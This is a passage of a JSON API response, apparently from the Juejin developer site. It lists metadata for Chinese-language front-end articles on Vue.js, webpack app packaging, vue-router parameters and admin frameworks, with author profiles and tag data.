"id_type": 9, "tag_alias": "", "post_article_count": 772, "concern_user_count": 3464}], "user_interact": {"id": 6995068964887855118, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6844903645201465357", "article_info": {"article_id": "6844903645201465357", "user_id": "4441682705129998", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640400832167949, 6809640455534280711, 6809640357354012685], "visible_level": 0, "link_url": "https://juejin.im/post/6844903645201465357", "cover_image": "", "is_gfw": 0, "title": "webpack + Vue + Hbuilder 打包成App,混合app开发,一个人搞定", "brief_content": "Hbuilder 官网推荐的UI组件是Mui, 自己定义了方法,剥去了jquery方法,反正我没多少用过,一脸懵逼 ,毕竟学习成本又加重了。 vue react的热门程度我在这里也不说了,看招聘网站可想而知。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1532362673", "mtime": "1599554476", "rtime": "1532412761", "draft_id": "6845075579662761992", "view_count": 13259, "collect_count": 111, "digg_count": 156, "comment_count": 33, "hot_index": 851, "is_hot": 0, "rank_index": 0.00143612, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4441682705129998", "user_name": "sponing", "company": "信必优", "job_title": "前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/1d3c4930bed1dc937e1fb1556bbcd821~300x300.image", "level": 3, "description": "前端H5 Javascript ", "followee_count": 19, "follower_count": 1358, "post_article_count": 29, "digg_article_count": 659, "got_digg_count": 2111, "got_view_count": 91235, "post_shortmsg_count": 0, "digg_shortmsg_count": 10, "isfollowed": false, "favorable_author": 0, "power": 1105, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546521, "tag_id": "6809640400832167949", "tag_name": "Android", "color": "#A3CC28", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7bab0e1e66ea386e6f94.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435964175, "mtime": 1631691990, "id_type": 9, "tag_alias": "", "post_article_count": 42170, "concern_user_count": 254122}, {"id": 2546561, "tag_id": "6809640455534280711", "tag_name": "APK", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/38ab2c37193978a8cf20.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1436291203, "mtime": 1631638587, "id_type": 9, "tag_alias": "", "post_article_count": 965, "concern_user_count": 23158}, {"id": 2546490, "tag_id": "6809640357354012685", "tag_name": "React.js", "color": "#61DAFB", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f655215074250f10f8d4.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234367, "mtime": 1631692935, "id_type": 9, "tag_alias": "", "post_article_count": 16999, "concern_user_count": 226420}], "user_interact": {"id": 6844903645201465357, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6944885228368298020", "article_info": {"article_id": "6944885228368298020", "user_id": "166781499739358", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/072091a34e1f46d187f4894b68cf383f~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "Vue重构项目之权限配置篇", "brief_content": "最近项目需求不是很多,想到公司后台管理项目有些过于臃肿,相帮它减减肥。 奈何君有意,了却她无情。 jQ+bootstrapt的非主流内衣、template-web的硬核外套、html+css+js的老实牌秋裤、cdn铭牌的各种包包,一眼看上去还不错是不是。跟着她回到家,一开门人…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1616982227", "mtime": "1622804582", "rtime": "1616987915", "draft_id": "6944160621332004895", "view_count": 885, "collect_count": 20, "digg_count": 22, "comment_count": 5, "hot_index": 71, "is_hot": 0, "rank_index": 0.00143503, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "166781499739358", "user_name": "凉城a", "company": "steam", "job_title": "一个前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/16c456cf9b93131d7ec~tplv-t2oaga2asx-image.image", "level": 3, "description": "公众号:「前端面试官」\n\n热爱技术也热爱生活", "followee_count": 22, "follower_count": 226, "post_article_count": 35, "digg_article_count": 88, "got_digg_count": 1200, "got_view_count": 48948, "post_shortmsg_count": 33, "digg_shortmsg_count": 43, "isfollowed": false, "favorable_author": 1, "power": 1689, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6944885228368298020, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6992874580171816973", "article_info": {"article_id": "6992874580171816973", "user_id": "4063411015268776", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "学习笔记(三)封装一个简单的 Vue.js", "brief_content": "如果有问题,或者有更好的解决方案,欢迎大家分享和指教。 交个朋友或进入前端交流群:-GuanEr- 本笔记的目的是更加深入完善的理解响应式。 一、最终目标 编译DOM,解析插值表达式,将表达式对应的值", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628155529", "mtime": "1628159770", "rtime": "1628159770", "draft_id": "6992874188579012621", "view_count": 166, "collect_count": 1, "digg_count": 3, "comment_count": 0, "hot_index": 11, "is_hot": 0, "rank_index": 0.00143404, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4063411015268776", "user_name": "Arya二丫", "company": "", "job_title": "小前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/602c6eee08aec8ffe395f9b2fea53f09~300x300.image", "level": 1, "description": "咯", "followee_count": 0, "follower_count": 3, "post_article_count": 4, "digg_article_count": 0, "got_digg_count": 5, "got_view_count": 378, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 8, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6992874580171816973, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6987559229481549854", "article_info": {"article_id": "6987559229481549854", "user_id": "2612095357823160", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7527cb92de9c404a9804590f34e3b043~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "5x3 精读Vue官方文档 - 安全", "brief_content": "精读 Vue 官方文档系列 🎉 报告安全漏洞 如发现任何安全漏洞,请邮件给 security@vuejs.org。会有全职贡献者及时处理。 永远不要使用不可信任的模板 永远不要将不可信任的内容作为模板", "is_english": 0, "is_original": 1, "user_index": 4.808972489320217, "original_type": 0, "original_author": "", "content": "", "ctime": "1626917964", "mtime": "1627028553", "rtime": "1627028553", "draft_id": "6987559101861462053", "view_count": 191, "collect_count": 1, "digg_count": 2, "comment_count": 0, "hot_index": 11, "is_hot": 0, "rank_index": 0.00143264, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2612095357823160", "user_name": "Mottle", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/2adccb0d364902ead37c150543da8de1~300x300.image", "level": 2, "description": "在努力成为一名高级前端中....", "followee_count": 1, "follower_count": 610, "post_article_count": 74, "digg_article_count": 44, "got_digg_count": 249, "got_view_count": 23836, "post_shortmsg_count": 24, "digg_shortmsg_count": 6, "isfollowed": false, "favorable_author": 0, "power": 487, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6987559229481549854, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6988894310049513509", "article_info": {"article_id": "6988894310049513509", "user_id": "2418581309753207", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue v-for的key值如何设置?", "brief_content": "Vue的v-for key值到底怎么设置呢?不设置key值,ESlint会报错; key值设置为唯一标识,如item.id可以; key值设置为index通常情况下也不影响渲染。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1627228858", "mtime": "1627440901", "rtime": "1627440901", "draft_id": "6988893110788947976", "view_count": 234, "collect_count": 1, "digg_count": 2, "comment_count": 1, "hot_index": 14, "is_hot": 0, "rank_index": 0.00143204, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2418581309753207", "user_name": "荞叶", "company": "平安银行", "job_title": "web前端开发", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/mosaic-legacy/3795/3044413937~300x300.image", "level": 1, "description": "长期主义", "followee_count": 33, "follower_count": 7, "post_article_count": 5, "digg_article_count": 36, "got_digg_count": 2, "got_view_count": 2710, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 29, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6988894310049513509, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6871517861702500366", "article_info": {"article_id": "6871517861702500366", "user_id": "1996368849408951", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/25850b152ff34f1babdb9523b2ea8f01~tplv-k3u1fbpfcp-zoom-1.image", "is_gfw": 0, "title": "小白易懂 | 15分钟基于vue/cli完成服务端渲染", "brief_content": "为什么要整两句诗呢?我也不知道。就是感觉很厉害!(每一个小白终将成为大佬,从入门到黄袍加身) 哈喽,大家好!我是前端Up主。一个有代码洁癖的前端攻城狮( 哈哈,生活很邋遢(* ̄︶ ̄) ) 小伙伴看到标题会问了,整ssr用nuxt不就完事了?绿色又环保。但是小编想说了:你保不住有…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1599900000", "mtime": "1600006354", "rtime": "1600006354", "draft_id": "6871145437206839309", "view_count": 2376, "collect_count": 69, "digg_count": 50, "comment_count": 24, "hot_index": 192, "is_hot": 0, "rank_index": 0.00143175, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1996368849408951", "user_name": "前端Up主", "company": "中电金信", "job_title": "FE", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4247a01cce2f0db92ec6b1ce1c785f3b~300x300.image", "level": 3, "description": "", "followee_count": 3, "follower_count": 291, "post_article_count": 10, "digg_article_count": 14, "got_digg_count": 931, "got_view_count": 52399, "post_shortmsg_count": 6, "digg_shortmsg_count": 5, "isfollowed": false, "favorable_author": 0, "power": 1454, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6871517861702500366, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "7000779730815287332", "article_info": {"article_id": "7000779730815287332", "user_id": "2981531267897565", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue-router 路由跳转传参刷新页面后参数丢失问题", "brief_content": "常见场景:点击列表详情,跳转到详情内页,传递id参数获取详情数据。 我们先来看看路由跳转的几种方式: 1、通过params方式传参 通过$route.push的path携带参数方式 (路由配置中指定参", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629996354", "mtime": "1630052419", "rtime": "1630052419", "draft_id": "7000777782254911501", "view_count": 64, "collect_count": 2, "digg_count": 1, "comment_count": 0, "hot_index": 4, "is_hot": 0, "rank_index": 0.00143121, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2981531267897565", "user_name": "全世界我最酷", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/e9661647cd3a8428876a1430a9f7b408~300x300.image", "level": 1, "description": "", "followee_count": 24, "follower_count": 3, "post_article_count": 56, "digg_article_count": 54, "got_digg_count": 15, "got_view_count": 3400, "post_shortmsg_count": 0, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 49, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 7000779730815287332, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6993877823060443173", "article_info": {"article_id": "6993877823060443173", "user_id": "2796746683196462", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "一定要收藏的5个后台管理系统的前端框架", "brief_content": "当你开发新项目的时候,如何快速的完成一个项目的搭建,这个时候就需要借助到一些模板了,现在网上各类UI模板都是相当的齐全的,本文就介绍几个靓仔觉得非常不错的前端框架,感兴趣的可以了解一下。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628389184", "mtime": "1628400881", "rtime": "1628400881", "draft_id": "6993876772127244318", "view_count": 116, "collect_count": 0, "digg_count": 5, "comment_count": 0, "hot_index": 10, "is_hot": 0, "rank_index": 0.00143025, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2796746683196462", "user_name": "靓仔聊编程", "company": "", "job_title": "公众号:靓仔聊编程", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/adf91c63b6c4e80b42362e80dfc1cb55~300x300.image", "level": 1, "description": "某知名上市公司码农", "followee_count": 12, "follower_count": 0, "post_article_count": 8, "digg_article_count": 12, "got_digg_count": 23, "got_view_count": 628, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 29, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6993877823060443173, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6844903569330716685", "article_info": {"article_id": "6844903569330716685", "user_id": "61228380864183", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640398105870343, 6809640407484334093], "visible_level": 0, "link_url": "https://juejin.im/post/6844903569330716685", "cover_image": "", "is_gfw": 0, "title": "写了个移动端可滑动(惯性滑动&回弹)Vue导航栏组件 ly-tab", "brief_content": "前段时间写了一个移动端的自适应滑动Vue导航栏组件,觉得有一定实用性,大家可能会用得到(当然有些大佬自己写得更好的话就没必要啦),于是前两天整理了一下,目前已经发布到npm和GitHub上了,点我到npm,点我到GitHub项目,有需要的同学可以在项目中npm install …", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1520087087", "mtime": "1599438358", "rtime": "1520307341", "draft_id": "6845075385592315912", "view_count": 14527, "collect_count": 130, "digg_count": 195, "comment_count": 63, "hot_index": 984, "is_hot": 0, "rank_index": 0.0014301, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "61228380864183", "user_name": "ScoutYin", "company": "", "job_title": "1900", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/592f7d61c91b0c5e699176b981a396d0~300x300.image", "level": 2, "description": "我又开始写烂代码了", "followee_count": 36, "follower_count": 157, "post_article_count": 3, "digg_article_count": 210, "got_digg_count": 332, "got_view_count": 20813, "post_shortmsg_count": 1, "digg_shortmsg_count": 157, "isfollowed": false, "favorable_author": 0, "power": 540, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6844903569330716685, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6993866415916711949", "article_info": {"article_id": "6993866415916711949", "user_id": "1601308361494712", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": 